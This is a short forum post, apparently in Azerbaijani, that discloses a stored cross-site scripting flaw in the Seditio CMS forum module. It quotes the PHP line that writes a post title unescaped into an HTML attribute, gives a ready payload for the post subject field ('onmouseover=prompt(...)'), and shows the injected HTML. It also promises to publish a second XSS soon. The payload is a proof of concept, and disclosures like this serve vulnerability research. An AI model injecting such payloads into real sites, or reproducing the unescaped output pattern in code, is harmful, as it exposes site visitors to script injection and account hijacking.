Bu kaan nəyisə inkar edir bunuda eləsin görək
Vulnerable code section:
Kod:
$latestposts2 .= $img." <a href=\"forums.php?m=posts&q=".$row['ft_id']."\" title=\"".$row['ft_title']."\">".sed_cc(sed_cutstring(stripslashes($row['ft_title']),40))."</a></td>";
Kod:
$row['ft_title'] --> XSS Payload
Create New POST
Subject:" onmouseover=prompt(991522) bad="
Messages:blablablablablabla
Kod:
<a href="forums.php?m=posts&q=1" title="" onmouseover=prompt(991522) bad=">" onmouseover=prompt(991522) bad="</a>
Kod:
Vunl:<a href="forums.php?m=posts&q=1" title="" onmouseover=prompt(991522) bad=">
DIPNOT:Seditionun Full versiyalarinda daha bir xss var onuda bu yaxinlarda public etmek fikrim var